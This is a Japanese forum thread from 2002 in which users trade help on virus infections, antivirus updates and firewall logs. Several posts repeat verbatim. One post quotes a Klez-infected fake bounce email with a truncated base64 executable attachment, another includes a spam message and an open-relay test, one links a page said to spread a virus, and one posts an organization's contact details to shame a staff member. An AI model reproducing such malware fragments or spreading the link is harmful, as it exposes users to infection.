230 :206:02/01/31 12:31
>>226
そのウィルスつきメールだけど、下にあるみたいな感じだよね?
調べてみたら、うちの鯖でKlez.Eとして隔離されたものからいくつか見つかった。
# [email protected]もあったぞ(藁
おれが206で書いたのとは違って、205のアドレスを詐称しているわけではなさそうだ。
たしかにpostmasterからのエラーを装ってるけど、エラーをHTMLメールで
返すはずがないね。ただ、誰かが悪意を持って送信したのではなく、
ウィルス自身がこういうフォーマットで送ってるんだと思う。
att.ne.jpってAT&T JENSだっけ。サポートに連絡して、ウィルス感染者に
警告してもらうといい。ヘッダのIPアドレスと時刻からユーザが特定できるはず。
From: postmaster <[email protected]>
To: [email protected]
Subject: Undeliverable mail--"xxxxx" ← Returned mail--"xxxxx" ってのもあった
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=ZmH1Mo98155HReb00x
--ZmH1Mo98155HReb00x
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY>
<FONT>The following mail can't be sent to [email protected]:<br>
<br>
From: [email protected]<br>
To: [email protected]<br>
Subject: xxxxx<br>
The attachment is the original mail</FONT></BODY></HTML>
--ZmH1Mo98155HReb00x
Content-Type: application/octet-stream;
name=Lfm.bat
Content-Transfer-Encoding: base64
Content-ID: <O0g53nSe8439rt>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
以下略
そのウィルスつきメールだけど、下にあるみたいな感じだよね?
調べてみたら、うちの鯖でKlez.Eとして隔離されたものからいくつか見つかった。
# [email protected]もあったぞ(藁
おれが206で書いたのとは違って、205のアドレスを詐称しているわけではなさそうだ。
たしかにpostmasterからのエラーを装ってるけど、エラーをHTMLメールで
返すはずがないね。ただ、誰かが悪意を持って送信したのではなく、
ウィルス自身がこういうフォーマットで送ってるんだと思う。
att.ne.jpってAT&T JENSだっけ。サポートに連絡して、ウィルス感染者に
警告してもらうといい。ヘッダのIPアドレスと時刻からユーザが特定できるはず。
From: postmaster <[email protected]>
To: [email protected]
Subject: Undeliverable mail--"xxxxx" ← Returned mail--"xxxxx" ってのもあった
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=ZmH1Mo98155HReb00x
--ZmH1Mo98155HReb00x
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY>
<FONT>The following mail can't be sent to [email protected]:<br>
<br>
From: [email protected]<br>
To: [email protected]<br>
Subject: xxxxx<br>
The attachment is the original mail</FONT></BODY></HTML>
--ZmH1Mo98155HReb00x
Content-Type: application/octet-stream;
name=Lfm.bat
Content-Transfer-Encoding: base64
Content-ID: <O0g53nSe8439rt>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
以下略
231 :名無しさん@お腹いっぱい。:02/01/31 13:50
216の者です。
結局のところ、パターン214で eicar のチェック漏れがあったとのこと。
トレンドマイクロへ確認しました。
BADTRANS とか HYBRIS とか送り付けてみましたがこっちは214でもOK。
今はパターン216になって、元に戻ってます。
結局のところ、パターン214で eicar のチェック漏れがあったとのこと。
トレンドマイクロへ確認しました。
BADTRANS とか HYBRIS とか送り付けてみましたがこっちは214でもOK。
今はパターン216になって、元に戻ってます。
232 :205:02/01/31 15:14
>>230
お返事ありがとうございます。
>そのウィルスつきメールだけど、下にあるみたいな感じだよね?
その通りです。HTMLのタグの感じとか、メッセージ内容などまるっきり同じです。
>エラーをHTMLメールで返すはずがないね
なるほど、言われてみればその通りですね。気が付かなかった。
さすがですね
>誰かが悪意を持って送信したのではなく ウィルス自身がこういう
>フォーマットで送ってるんだと思う。
どうやらその可能性が高いようですね、失礼しました。
ウイルスがわざわざenvelope-fromを適当なものに変えてまで
第三者中継可能なSMTPサーバーを利用しているのが不自然に思えたのです。
Klezがどのようにして送信に利用するSMTPサーバーとenvelepe-fromに使う文字列を
決定しているのかにちょっと興味があります。
もしかしたら、このウイルス感染しているマシンはSPAM送信業者の物であるかも
しれません。なぜかというと、彼から送られてきたメールが3通ほどあるのですが、
どれも利用された私のメールアドレスはSPAMが頻繁に送られてくるものだったからです。
また、それならば第三者中継可能なSMTPサーバーを普段から利用しており、
Klezがマシンからその情報を手に入れてメールを出してきたということも考えられます。
1点だけ確認させて頂きたいのですが、206さんが受け取ったそのメールの送信元は
att.ne.jp以外でしたでしょうか?
よろしくお願いします。
なお、彼からの送信は1/28あたりで終わっておりそれっきりなようですので、
ISPへの連絡は(めんどうだし)しないつもりです。
233 :第三中継可能 cc.sookmyung.ac.kr:02/01/31 15:53
Received: from cc.sookmyung.ac.kr (203.252.201.4) by sitemail.everyone.net with SMTP; **
Received: from vv68gIjB6 (localhost [127.0.0.1]) by cc.sookmyung.ac.kr (8.9.3/8.9.3) with SMTP id ** (KST)
From: [email protected]
Date:**
Subject: Need Help? Benefactored Program...hurry don't miss out!
---
Hello Friends,
If you need HELP and would like to be benefactored
into a new FABULOUS
program, please let me know right away!! I will put
you into a
"temporary" matrix to hold your position until the
company allows us to enter
people on Feb. 4! The overflow will be enormous.
Please reserve your
spot now!
Send your info to
[email protected]
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to me [email protected]
---
egret.sookmyung.ac.kr (pri=20)
接続に失敗:ネットワークが混雑しているか、サーバが停止している可能性があります。
-----
cc.sookmyung.ac.kr (pri=10)
< 220-InterScan Version 3.6-Build_1166 $Date: 04/24/2001 22:13:0052$: Ready
< 220 cc.sookmyung.ac.kr ESMTP Sendmail 8.9.3/8.9.3;
> HELO rlytest.nanet.co.jp
< 250 cc.sookmyung.ac.kr Hello localhost [127.0.0.1], pleased to meet you
> MAIL FROM:< http://www.nanet.co.jp/rlytest/[email protected] >
< 250 < http://www.nanet.co.jp/rlytest/[email protected] >... Sender ok
> RCPT TO:<[email protected]>
< 250 <[email protected]>... Recipient ok
> QUIT
< 221 cc.sookmyung.ac.kr closing connection
問題あり:不正な中継を受け付けます。
(203.252.201.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。
Received: from vv68gIjB6 (localhost [127.0.0.1]) by cc.sookmyung.ac.kr (8.9.3/8.9.3) with SMTP id ** (KST)
From: [email protected]
Date:**
Subject: Need Help? Benefactored Program...hurry don't miss out!
---
Hello Friends,
If you need HELP and would like to be benefactored
into a new FABULOUS
program, please let me know right away!! I will put
you into a
"temporary" matrix to hold your position until the
company allows us to enter
people on Feb. 4! The overflow will be enormous.
Please reserve your
spot now!
Send your info to
[email protected]
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to me [email protected]
---
egret.sookmyung.ac.kr (pri=20)
接続に失敗:ネットワークが混雑しているか、サーバが停止している可能性があります。
-----
cc.sookmyung.ac.kr (pri=10)
< 220-InterScan Version 3.6-Build_1166 $Date: 04/24/2001 22:13:0052$: Ready
< 220 cc.sookmyung.ac.kr ESMTP Sendmail 8.9.3/8.9.3;
> HELO rlytest.nanet.co.jp
< 250 cc.sookmyung.ac.kr Hello localhost [127.0.0.1], pleased to meet you
> MAIL FROM:< http://www.nanet.co.jp/rlytest/[email protected] >
< 250 < http://www.nanet.co.jp/rlytest/[email protected] >... Sender ok
> RCPT TO:<[email protected]>
< 250 <[email protected]>... Recipient ok
> QUIT
< 221 cc.sookmyung.ac.kr closing connection
問題あり:不正な中継を受け付けます。
(203.252.201.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。
234 :名無しさん@お腹いっぱい。:02/01/31 16:31
あるPCからアクセスを受けました
ファイアウォールのログは
インバウンド UDP パケット
ローカルアドレス,サービスは xxx.xxx.xxx.xxx,1900
リモートアドレス,サービスは xxx.xxx.xxx.xxx,1025
プロセス名はMPREXE.EXE
と言うものでした
これってなんですかね?
何かわかる方がいらっしゃいましたらお願いします
ファイアウォールのログは
インバウンド UDP パケット
ローカルアドレス,サービスは xxx.xxx.xxx.xxx,1900
リモートアドレス,サービスは xxx.xxx.xxx.xxx,1025
プロセス名はMPREXE.EXE
と言うものでした
これってなんですかね?
何かわかる方がいらっしゃいましたらお願いします
235 :206:02/01/31 17:01
>>232
>Klezがどのようにして送信に利用するSMTPサーバーとenvelepe-fromに使う文字列を
>決定しているのかにちょっと興味があります。
Klez.Dのときに某アンチウィルスベンダーの技術者の人から聞いたところによると、
送信に使う鯖は、メールアドレスの @ 以降のドメイン名の頭に"smtp."を
つけたものになるそうな。つまり、[email protected]で出そうとするときは、
smtp.2ch.netという鯖を使うことになる。
送信に使うアドレスは、アドレス帳にあるものを使う場合と、ウィルスの中に
いくつか埋め込まれているものを使う場合の2とおりあるらしい。
>1点だけ確認させて頂きたいのですが、206さんが受け取ったそのメールの送信元は
>att.ne.jp以外でしたでしょうか?
韓国です。言葉が通じません。どないせぇ言うんじゃ。
>Klezがどのようにして送信に利用するSMTPサーバーとenvelepe-fromに使う文字列を
>決定しているのかにちょっと興味があります。
Klez.Dのときに某アンチウィルスベンダーの技術者の人から聞いたところによると、
送信に使う鯖は、メールアドレスの @ 以降のドメイン名の頭に"smtp."を
つけたものになるそうな。つまり、[email protected]で出そうとするときは、
smtp.2ch.netという鯖を使うことになる。
送信に使うアドレスは、アドレス帳にあるものを使う場合と、ウィルスの中に
いくつか埋め込まれているものを使う場合の2とおりあるらしい。
>1点だけ確認させて頂きたいのですが、206さんが受け取ったそのメールの送信元は
>att.ne.jp以外でしたでしょうか?
韓国です。言葉が通じません。どないせぇ言うんじゃ。
236 :205:02/02/01 13:45
237 :名無しさん@お腹いっぱい。:02/02/01 18:23
ウィルス感染しちまったのですが、ひどいんです・・・
自分自身のフォルダに、ウィルスメールを送りつけまくる。nimdaなら容量が
決まってるじゃないですか。ところがこいつは、各フォルダの容量ごとに変わる。
ネットにつなげない、ウィルス対策をしてなかったので(あはははは)、オンライン
チェックしたくても、ウィルスソフトを使おうにも、使えん。
どーしたもんでしょ
自分自身のフォルダに、ウィルスメールを送りつけまくる。nimdaなら容量が
決まってるじゃないですか。ところがこいつは、各フォルダの容量ごとに変わる。
ネットにつなげない、ウィルス対策をしてなかったので(あはははは)、オンライン
チェックしたくても、ウィルスソフトを使おうにも、使えん。
どーしたもんでしょ
238 :眠い人:02/02/01 18:49
>237
投げて旅に出よう。
投げて旅に出よう。
239 :名無しさん@お腹いっぱい。:02/02/01 19:04
たた旅すか??そんなあぁぁぁぁぁぁぁぁぁ
♪旅は〜まだ〜終わら〜ない〜〜〜♪
・・・ぷろじぇくとXしてる場合ではなかった。おながいします。
♪旅は〜まだ〜終わら〜ない〜〜〜♪
・・・ぷろじぇくとXしてる場合ではなかった。おながいします。
240 :名無しさん@お腹いっぱい。:02/02/01 20:11
241 :名無しさん@お腹いっぱい。:02/02/01 20:19
先生!だから、そーゆーコトなんですぅ
ネットにつなげないので、自分自身に送りつけまくってるもよう。うぐぅ
ネットにつなげないので、自分自身に送りつけまくってるもよう。うぐぅ
242 :名無しさん@お腹いっぱい。:02/02/01 20:30
>>237
ウィルス対策ソフトを買って下さいNE!
ウィルス対策ソフトを買って下さいNE!
243 :名無しさん@お腹いっぱい。:02/02/01 21:10
>>242先生!! ノートン先生を(2001)持ってるのですが!ネットにつなげないため、
最新プログラムを入手でけないのです!
IEを使おうとしても、”exe何ちゃらが壊れてるので開けません”って・・・ウィルスのせいか?
何とかnimdaチェックは出来たのですが、nimdaではなかった
最新プログラムを入手でけないのです!
IEを使おうとしても、”exe何ちゃらが壊れてるので開けません”って・・・ウィルスのせいか?
何とかnimdaチェックは出来たのですが、nimdaではなかった
244 :名無しさん@お腹いっぱい。:02/02/01 21:15
>>243
もーOS再インストールせよ。
もーOS再インストールせよ。
245 :名無しさん@お腹いっぱい。:02/02/01 21:15
フォーマット、ね。
246 :名無しさん@お腹いっぱい。:02/02/01 21:19
>>234
最近「インバウンド UDP でアクセス受けた」って人の質問が妙に多い。
そのログにある、インバウンド UDP パケット の直前に
アウトバウンド UDP パケットがあなたのPCから出てませんか?
UDP パケット はTCPのように3wayハンドシェイクを行わないので
相手から投げたパケットか、自分で要求した返答パケットなのか、
わからないのです。だから、ファイヤーウォールの設定が
インバウンドのUDPを全てブロックする設定になっていたら
当然、そのような返答パケットもブロックされます。
蛇足ですが MPREXE.EXEは、Windowsで用意された通信プログラムで、
UDPクライアントでもあります。
最近「インバウンド UDP でアクセス受けた」って人の質問が妙に多い。
そのログにある、インバウンド UDP パケット の直前に
アウトバウンド UDP パケットがあなたのPCから出てませんか?
UDP パケット はTCPのように3wayハンドシェイクを行わないので
相手から投げたパケットか、自分で要求した返答パケットなのか、
わからないのです。だから、ファイヤーウォールの設定が
インバウンドのUDPを全てブロックする設定になっていたら
当然、そのような返答パケットもブロックされます。
蛇足ですが MPREXE.EXEは、Windowsで用意された通信プログラムで、
UDPクライアントでもあります。
247 :abc:02/02/01 21:23
248 : :02/02/01 21:25
>>244先生!またまたすみません!!
数10GBデータがあるの!でーーーーーーす
なのでリカバリーを避ける道はないものかとあがいておりますぅ
ウィルス対策ソフトも何もしてなかったのかゴルァっつうお叱りは
甘んじて受けますぅ
ととにかくデータバックアップばんがりますぅ
数10GBデータがあるの!でーーーーーーす
なのでリカバリーを避ける道はないものかとあがいておりますぅ
ウィルス対策ソフトも何もしてなかったのかゴルァっつうお叱りは
甘んじて受けますぅ
ととにかくデータバックアップばんがりますぅ
249 :名無しさん@お腹いっぱい。:02/02/01 21:31
250 : :02/02/01 21:35
先生!IEを購入状態に戻す、又はコンポーネントを修復するではダメすか
251 :名無しさん@お腹いっぱい。:02/02/01 21:39
>>246
同感。確かにその系統の質問多いな。
>>243とまったく同じパターンで
「へんなヤツが俺のPCに不正アクセスしてきて、MPREXE.EXEを開こうと
しやがった!どうやって仕返ししたろか?」…ってなアフォもいた。
同感。確かにその系統の質問多いな。
>>243とまったく同じパターンで
「へんなヤツが俺のPCに不正アクセスしてきて、MPREXE.EXEを開こうと
しやがった!どうやって仕返ししたろか?」…ってなアフォもいた。
253 :名無しさん@お腹いっぱい。:02/02/01 23:54
>>248
パーティション切ってシステムとデータ分けるといい
パーティション切ってシステムとデータ分けるといい
254 :名無しさん@お腹いっぱい。:02/02/02 04:03
なんか今日いきなりPCの起動がやけに
重くなったと思ったらPE-CHIに感染してた
で、全部駆除してもまだOutlook Expressのみ起動が重くて
ずっとウェイトがかかってる・・・
5分くらいしてようやくOutlook Expressが起動したと思ったら
POP3サーバーとメールサーバーのログインIDとパスワードが書き換わってた
ウイルスバスター2002の体験版で検索してもウイルスにはもう引っかからないのですが
Outlook Expressの起動は以前直りません、だれここの症状に心当たりのある方は
いらっしゃらないでしょうか?
重くなったと思ったらPE-CHIに感染してた
で、全部駆除してもまだOutlook Expressのみ起動が重くて
ずっとウェイトがかかってる・・・
5分くらいしてようやくOutlook Expressが起動したと思ったら
POP3サーバーとメールサーバーのログインIDとパスワードが書き換わってた
ウイルスバスター2002の体験版で検索してもウイルスにはもう引っかからないのですが
Outlook Expressの起動は以前直りません、だれここの症状に心当たりのある方は
いらっしゃらないでしょうか?
255 :名無しさん@お腹いっぱい。:02/02/02 13:33
256 : :02/02/02 14:46
ビールス、ウイルス、バイラス、ヴィールス、ヴァイラス
257 :名無しさん@お腹いっぱい。:02/02/02 16:56
>>254
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=2219
>本来であればWINDOWS\SYSTEMフォルダに存在するIMAGEHLP.DLLが、何らかの理由により削除されると、OutlookExpressの起動が非常に遅くなります。
>同様にIMAGEHLP.DLLのファイルが削除されている場合、ウイルスバスター2001のオンライン登録時に、各種項目を入力後、送信ボタンをクリックしてからライセンキーが表示されるまでに2分〜5分ほどの時間がかかってしまうことがあります。
>ウイルスバスター2001を始め、従来のウイルスバスターにおきましても、インストール時やアンインストール時、あるいは普段の使用において、IMAGEHLP.DLLを削除する事はありません。
>したがって、ウイルスバスターをインストールする前に、既存の他社製アンチウイルスソフトのアンインストールを行う過程で削除された可能性があります。
>具体的には、McAfee社のVirusScanをアンインストールすると削除される場合があるようです。
>このような場合はWindowsのCD-ROMや、同じWindowsがインストールされた別のPCなどから、 IMAGEHLP.DLLをWINDOWS\SYSTEMフォルダに復元されることをお勧めいたします。
マカフィー入れてませんでしたか?
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=2219
>本来であればWINDOWS\SYSTEMフォルダに存在するIMAGEHLP.DLLが、何らかの理由により削除されると、OutlookExpressの起動が非常に遅くなります。
>同様にIMAGEHLP.DLLのファイルが削除されている場合、ウイルスバスター2001のオンライン登録時に、各種項目を入力後、送信ボタンをクリックしてからライセンキーが表示されるまでに2分〜5分ほどの時間がかかってしまうことがあります。
>ウイルスバスター2001を始め、従来のウイルスバスターにおきましても、インストール時やアンインストール時、あるいは普段の使用において、IMAGEHLP.DLLを削除する事はありません。
>したがって、ウイルスバスターをインストールする前に、既存の他社製アンチウイルスソフトのアンインストールを行う過程で削除された可能性があります。
>具体的には、McAfee社のVirusScanをアンインストールすると削除される場合があるようです。
>このような場合はWindowsのCD-ROMや、同じWindowsがインストールされた別のPCなどから、 IMAGEHLP.DLLをWINDOWS\SYSTEMフォルダに復元されることをお勧めいたします。
マカフィー入れてませんでしたか?
258 :名無しさん@お腹いっぱい。:02/02/02 16:57
Nimda.encに感染してしまいました。
で、忘れていてPCの電源切ってしまいました。
するとPC起動できなくなってしまいました。
どうしたら治りますか?
で、忘れていてPCの電源切ってしまいました。
するとPC起動できなくなってしまいました。
どうしたら治りますか?
259 :名無しさん@お腹いっぱい。:02/02/02 17:16
(-∧-)おだぶつさん
260 :名無しさん@お腹いっぱい。:02/02/02 17:20
やっぱもう無理ですかね?
1Gのゲーム落としたばっかなのに・・・
1Gのゲーム落としたばっかなのに・・・
261 : :02/02/02 17:36
ttp://homepage3.nifty.com/girls_and_boys~/
このページ、ウイルスを食らわせるらしいんですが、詳しくはどのようなものなんでしょうか?
このページ、ウイルスを食らわせるらしいんですが、詳しくはどのようなものなんでしょうか?
262 :名無しさん@お腹いっぱい。:02/02/02 17:41
>>257
返答ありがとうございました、無事解決する事が出来ました
それと、マカフィーは入れてませんでした
最初のPE-CHIを退治する時に結構な数のファイルが隔離されたので
それが原因だったかもしれません
しかも隔離されたファイルを見ても
削除して問題なさそうだったので一括して消してしまいました
多分この中に必要なファイルがあったのかも知れないと思い
本日上書き再インストールしたところ直りました
返答ありがとうございました、無事解決する事が出来ました
それと、マカフィーは入れてませんでした
最初のPE-CHIを退治する時に結構な数のファイルが隔離されたので
それが原因だったかもしれません
しかも隔離されたファイルを見ても
削除して問題なさそうだったので一括して消してしまいました
多分この中に必要なファイルがあったのかも知れないと思い
本日上書き再インストールしたところ直りました
263 :名無しさん@お腹いっぱい。:02/02/02 19:05
264 : :02/02/02 19:24
265 :名無しさん@お腹いっぱい。:02/02/02 19:47
EVERYDAY PEOPLEのサイトが変なんですが。
移転したんでしょうか?
移転したんでしょうか?
閉じてしまってたんですね。
くだらない質問してすいません。
くだらない質問してすいません。
267 : :02/02/02 19:53
268 :質問です:02/02/02 22:07
機能、ネット(チャット)で知り合った人から、VBAをあげるといわれたのですが、
、よく知らない相手なので心配です。そのプログラムをもらうのは、
危険でしょうか。メールでもらうだけでも危険でしょうか?
怖かったのでメアドは持ってないと答えましたが、
IEからダウンロードできるようにしてあげるといわれました。
「○○○なソフトがあると便利だな」って話をしてたら、
作って上げるよってことになったのですが、どうも怪しいのです。
メールでもらったり、IEでダウンロードするだけでもダメでしょうか?
相手はかなりプログラムに詳しい人でプロだそうです。
、よく知らない相手なので心配です。そのプログラムをもらうのは、
危険でしょうか。メールでもらうだけでも危険でしょうか?
怖かったのでメアドは持ってないと答えましたが、
IEからダウンロードできるようにしてあげるといわれました。
「○○○なソフトがあると便利だな」って話をしてたら、
作って上げるよってことになったのですが、どうも怪しいのです。
メールでもらったり、IEでダウンロードするだけでもダメでしょうか?
相手はかなりプログラムに詳しい人でプロだそうです。
269 :cheshire-cat:02/02/02 23:09
>>268
とりあえずもらっておいて、「相性が悪かったのか起動できなかった」とでも言っとけば?
とりあえずもらっておいて、「相性が悪かったのか起動できなかった」とでも言っとけば?
270 :質問です:02/02/02 23:14
ありがとうございます。そうします。
271 :名無しさん@お腹いっぱい。:02/02/02 23:22
272 :cheshire-cat:02/02/02 23:38
273 :初心者:02/02/03 00:00
今シマンテックに入れないんですけど、何故なんでしょう?
ウィルス定義したいんですけど
ウィルス定義したいんですけど
274 :cheshire-cat:02/02/03 00:51
>>273
シマンテックはユーザーのアカウントを米国で一括管理しているんだけど、時々「不具合」が生じてLiveUpdateで更新できなかったりする。
直接ひっこ抜くとか。ちなみに今の最新定義ファイルの日付は1月30日。
http://www.symantec.com/region/jp/sarcj/defs.download.html
シマンテックはユーザーのアカウントを米国で一括管理しているんだけど、時々「不具合」が生じてLiveUpdateで更新できなかったりする。
直接ひっこ抜くとか。ちなみに今の最新定義ファイルの日付は1月30日。
http://www.symantec.com/region/jp/sarcj/defs.download.html
275 :名無しさん@お腹いっぱい。:02/02/03 01:18
>274
ああそうなのか。俺がバスターに乗り換えた理由のひとつ。
ああそうなのか。俺がバスターに乗り換えた理由のひとつ。
276 :名無しさん@お腹いっぱい。:02/02/03 05:41
今日ウィルスチェックしたら 4つも感染しているらしいのですが
どこから感染したか分かるのでしょうか?こんなのがでてきたのですが
js.exception c:\windows\temp
js.seekera c:\windows\temp
js.seekera c:\windows\temp
js.seekera c:\removeithta
どこから感染したか分かるのでしょうか?こんなのがでてきたのですが
js.exception c:\windows\temp
js.seekera c:\windows\temp
js.seekera c:\windows\temp
js.seekera c:\removeithta
277 :名無しさん@お腹いっぱい。:02/02/03 06:42
278 :名無しさん@お腹いっぱい。:02/02/03 17:36
メールを送ったら付けた覚えもないのに
添付ファイルがついてるといわれました。
送った相手も初心者だったので、開いてしまったらしいんですが
中身は何も書かれていない空のファイルだったとの事です。
hotmailを使っているのですが、今までウィルス等の害を
くらったことがなくて、全然自体が把握できません。
俺も相手のパソコンも今のとこ支障なく動いてるんですが
これってウィルスなんですか?
添付ファイルがついてるといわれました。
送った相手も初心者だったので、開いてしまったらしいんですが
中身は何も書かれていない空のファイルだったとの事です。
hotmailを使っているのですが、今までウィルス等の害を
くらったことがなくて、全然自体が把握できません。
俺も相手のパソコンも今のとこ支障なく動いてるんですが
これってウィルスなんですか?
279 :cheshire-cat:02/02/03 17:39
>>278
hotmailって、添付ファイルのウイルスを駆除してくれなかったっけ?
hotmailって、添付ファイルのウイルスを駆除してくれなかったっけ?
280 :名無しさん@お腹いっぱい。:02/02/03 17:52
相手はhotmailじゃないんです。
自分も不注意に添付ファイルを開いたような記憶はないんですが。
自分も不注意に添付ファイルを開いたような記憶はないんですが。
281 : :02/02/03 17:53
2002/02/03(日) SkyPerfecTV
昨日買ったものはスカパーのチューナー。昨日深夜に帰宅したので今日設置したのですが、なんという運の悪さ。
朝から雨。プラス雪。凍えるぐらいに寒い。雨の中ベランダにアンテナを設置しました。買ったのは Sony SAS-SP1SET。
ビックカメラで 19800 円。今買うと購入時 10% ポイント還元だけでなく、スカパーとの契約時にビックカメラから10000 ポイント還元。
実質 8000 円程度で購入してます。これを MTV2000 に回せる!と思いきや、ポイントが入るのは1ヶ月先とのこと。残念無念。
昨日買ったものはスカパーのチューナー。昨日深夜に帰宅したので今日設置したのですが、なんという運の悪さ。
朝から雨。プラス雪。凍えるぐらいに寒い。雨の中ベランダにアンテナを設置しました。買ったのは Sony SAS-SP1SET。
ビックカメラで 19800 円。今買うと購入時 10% ポイント還元だけでなく、スカパーとの契約時にビックカメラから10000 ポイント還元。
実質 8000 円程度で購入してます。これを MTV2000 に回せる!と思いきや、ポイントが入るのは1ヶ月先とのこと。残念無念。
>>278
ウィルスチェックしてみな。そうしないと何とも言えないね。
ウィルスチェックしてみな。そうしないと何とも言えないね。
283 : :02/02/04 20:24
284 :ねこ:02/02/04 23:44
今日文字化けしたメールがとどいて添付ファイルが一緒についてきました。
そのファイル名が「HUMOR.MP3」だったんですけど、これってウィルスですか?
そのファイル名が「HUMOR.MP3」だったんですけど、これってウィルスですか?
285 :名無しさん@お腹いっぱい。:02/02/04 23:50
>284
それグーグルで検索すると山のようにヒットするが?
それグーグルで検索すると山のようにヒットするが?
286 :名無しさん@お腹いっぱい。:02/02/05 00:03
ヴァイルスだな。たぶん。
とりあえず、>>278と>>284はチェックしとけよ。
(↓シマンコテックオンラインチェック)
http://security2.norton.com/ssc/home.asp?j=1&langid=jp&venid=sym&plfid=20&pkj=OEUTLSIVFWMFKPXKBQW
とりあえず、>>278と>>284はチェックしとけよ。
(↓シマンコテックオンラインチェック)
http://security2.norton.com/ssc/home.asp?j=1&langid=jp&venid=sym&plfid=20&pkj=OEUTLSIVFWMFKPXKBQW
287 :284:02/02/05 00:17
添付ファイルは見ないで削除したんですが、感染してました・・・。
288 :名無しさん@お腹いっぱい。:02/02/05 09:39
WinMEでIE5.0なんですが、
たまーにブラウザを立ち上げると画面が真っ白になって
それ以後何も受け付けず、Ctr+Alt+Deleteをすると
画面が真っ暗になって電源を切るよりしかできなくなってしまいます。
WinMEは再インストールしたばかり。
心当たりといえばわけわからんリンクをクリックしてしまったのと
身元不明のメールを即削除したぐらいなんですが…
どなたかそういうウィルスやらブラクラだか知ってる人はいないでしょうか?
たまーにブラウザを立ち上げると画面が真っ白になって
それ以後何も受け付けず、Ctr+Alt+Deleteをすると
画面が真っ暗になって電源を切るよりしかできなくなってしまいます。
WinMEは再インストールしたばかり。
心当たりといえばわけわからんリンクをクリックしてしまったのと
身元不明のメールを即削除したぐらいなんですが…
どなたかそういうウィルスやらブラクラだか知ってる人はいないでしょうか?
すいません。
IE5.5でした。
IE5.5でした。
>>286
(´-`).。oO( 「ウィルス」か「ヴァイラス」と呼ぶのがよろしいかと存じage…。)
(´-`).。oO( 「ウィルス」か「ヴァイラス」と呼ぶのがよろしいかと存じage…。)
291 : :02/02/05 10:38
>>288
ブラクラは除外できる可能性は高いよ。
(ほとんど、窓を沢山開かせてフリーズとかさせるだけ。
ただし、+アルファのものが絶対にないとは言えないが。)
ウイルスなどそういう悪意のプログラムによるかどうかは
分からないけど、現象としてIEが何かおかしい可能性は
ものすごく高いと思う。
この際だからまずは、ノートンかトレンドマイクロの
アンチウイルスソフトを買う。それに先だってオンラインスキャンも
やっておいていいかも。
それから、IE5.0は修復。。。といいたいところだけど、
この際5.5+SP2か6にバージョンアップしてしまっていいのでは?
最後にMEを再インストールしたと書いているけど、
上書きインストール(修復インストール)だと改善されない
トラブルは多いので、面倒でもクリーンインストールする方が
結局は早いことが多いよ。
ブラクラは除外できる可能性は高いよ。
(ほとんど、窓を沢山開かせてフリーズとかさせるだけ。
ただし、+アルファのものが絶対にないとは言えないが。)
ウイルスなどそういう悪意のプログラムによるかどうかは
分からないけど、現象としてIEが何かおかしい可能性は
ものすごく高いと思う。
この際だからまずは、ノートンかトレンドマイクロの
アンチウイルスソフトを買う。それに先だってオンラインスキャンも
やっておいていいかも。
それから、IE5.0は修復。。。といいたいところだけど、
この際5.5+SP2か6にバージョンアップしてしまっていいのでは?
最後にMEを再インストールしたと書いているけど、
上書きインストール(修復インストール)だと改善されない
トラブルは多いので、面倒でもクリーンインストールする方が
結局は早いことが多いよ。
292 :眠い人:02/02/05 13:01
はーい。
[email protected]からBADTRANS.B型が届きました。
特定非営利活動法人「木の建築フォラム」とか名乗っていやがります。
ただこれだけなら別に曝すつもりはなかったのですけど、電話応対に出たババアがオオバカで
前の総理の森総理大臣みたいなクルクルパーでしたので。
ちなみに電話番号は03-5144-0056です。
[email protected]からBADTRANS.B型が届きました。
特定非営利活動法人「木の建築フォラム」とか名乗っていやがります。
ただこれだけなら別に曝すつもりはなかったのですけど、電話応対に出たババアがオオバカで
前の総理の森総理大臣みたいなクルクルパーでしたので。
ちなみに電話番号は03-5144-0056です。
>>291
回答ありがとうございます。
MEは一応クリーンインストールしたんですよ。
っで一週間もたたないうちにトラブッたんでちょっとショックを…
とりあえずIEのバージョンアップ、ダメならウィルスソフト、
それでもダメならクリーンインストール、っという感じで
やってみようかと思います。
ありがとうございました!
回答ありがとうございます。
MEは一応クリーンインストールしたんですよ。
っで一週間もたたないうちにトラブッたんでちょっとショックを…
とりあえずIEのバージョンアップ、ダメならウィルスソフト、
それでもダメならクリーンインストール、っという感じで
やってみようかと思います。
ありがとうございました!
294 :名無しさん@お腹いっぱい。:02/02/05 14:32
下記の様なウイルスの情報ご存知の方いますか?
InterScanとVirusScan使ってますがどちらにも引っかかりません。
送信者:fun@******(******は感染者使用のドメイン名、一応ふせときます)
件名:A IE 6.0 patch
本文[2行]:This is a IE 6.0 patch(改行)I wish you would like it
添付:ATT00003.txt(138byt)、README.TXT(3.12KB)
InterScanとVirusScan使ってますがどちらにも引っかかりません。
送信者:fun@******(******は感染者使用のドメイン名、一応ふせときます)
件名:A IE 6.0 patch
本文[2行]:This is a IE 6.0 patch(改行)I wish you would like it
添付:ATT00003.txt(138byt)、README.TXT(3.12KB)
295 :[email protected]:02/02/05 15:17
http://www.forum.or.jp/
特定非営利活動法人「木の建築フォラム」
〒104-6204 東京都中央区晴海1-8-12 オフィスタワーZ4F
−−−−−
http://www.forum.or.jp/forum-tsushin/forum-tsushin-1.pdf
に [email protected] がある。
特定非営利活動法人「木の建築フォラム」
〒104-6204 東京都中央区晴海1-8-12 オフィスタワーZ4F
−−−−−
